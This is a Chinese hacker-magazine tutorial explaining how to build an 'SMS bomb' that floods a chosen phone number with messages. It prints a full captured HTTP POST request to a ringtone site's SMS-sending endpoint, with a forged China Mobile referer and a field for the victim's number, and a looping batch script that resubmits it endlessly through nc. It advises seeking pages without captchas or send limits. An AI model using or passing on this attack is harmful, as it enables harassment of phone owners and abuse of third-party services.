[组图]安静的小E也谈短信炸弹
荐 ★★★★★
安静的小E也谈短信炸弹
最近忙于工作,也断了2个月网络,哎@!~~~~
本文已发表于黑客防线06年第10期,转载请注明出处!
------------安静的小E
看过了06.08的“菜鸟也做短信炸弹”,觉得思路独到,原作者利用的是HTML构造表单,然后利用网站发信页面,实现无限循环提交。这样就弥补了网上一些“手机炸弹”类似程序的不足,一但发现网站发信页面失效了,可以直接修改链接,实现永不失效的效果。有些东西其实就是那么简单的原理,看你会不会去想了。
看过文章后,了解了简单的原理,忽然有一个想法,HTML构造表单能实现“信息炸弹”的效果,那么我用批处理写出来会不会达到同样的效果,经过测试,发现批处理也可以实现同样的效果。
随便找一个http://u.5ku.com,是个彩信、铃声下载站,并且在给手机发送信息的时候也无需验证码,(如图1)
就用这个吧!和原文同样的原理,用WSockExpert抓包分析数据,这里我就不罗嗦了,不会的看上期文章。
首先我们先新建一个1.txt文本文档,写入关键代码(这里我构造好了):
------------------------------------------------------------------------------------------------------------------------------------------
POST /register/reg02.aspx?Type=TX&Id=23441&a=200323&b=1&c=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: u.5ku.com
Content-Length: 20
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=paml2n45eitn5qvd2uz5nkv5
mobileNo=13*********
------------------------------------------------------------------------------------------------------------------------------------------
需要解释的是:
http://www.hl.chinamobile.com/hlPortalWebApp/com/hlcm2/clt/jpf/slfsvc/usrreg_15/ActS32601_1.do?mmstype=4&mmsid=35588&uid=16068&a=&b=&c=&d=&e=&f=&g=这个是我修改的,为什么?这个地址比较权威,中国移动通信用户注册页面,大家可以随便自己修改,这个地址的页面(如图2)
,看到了吧!也没有验证码限制,并且速度爆快(大家在找页面的时候一定不要找有验证码的哦),还有在修改的时候要注意,有的彩信下载网站有次数限制,有一次我手机受到一个垃圾信息,就想玩他一下,后来我发现发了几条之后,就不能发送了,因为有发送次数限制的嘛,所以大家在使用的时候找一些无限制的网站页面。
mobileNo=13*********这个不用说了,写你要炸的手机号,其他信息都是抓包分析到的。
我们总要实现循环提交的吧,我们用NC(地球人都知道),然后再写一个批处理,方法如下:新建一个文本文档,然后写入:
------------------------------------------------------------------------------------------------------------------------------------------
:go
nc.exe -w 2 219.238.238.180 80<1.txt
goto go
------------------------------------------------------------------------------------------------------------------------------------------
NC的-w参数就是timeout的时间,219.238.238.180是彩信网站的IP,然后指向一下我们刚才建立的1.txt,最后保存为BAT批处理。现在一个批处理信息炸弹就完成了,(如图3)
然后我们如何使用呢?首先在1.txt里把mobileNo=13*********修改成你要炸的手机号,把NC打开,然后再打开手机炸弹.BAT(如图4)。
HOHO!然后最小化玩别的去吧!
本文到这里就结束了,就目前来说,这样的信息炸弹对用户来说还没有什么好的防范方法,大家一定要小心警惕,不要把自己的手机号随意透露!
文章录入:cainiaowang 责任编辑:cainiaowang
您现在的位置: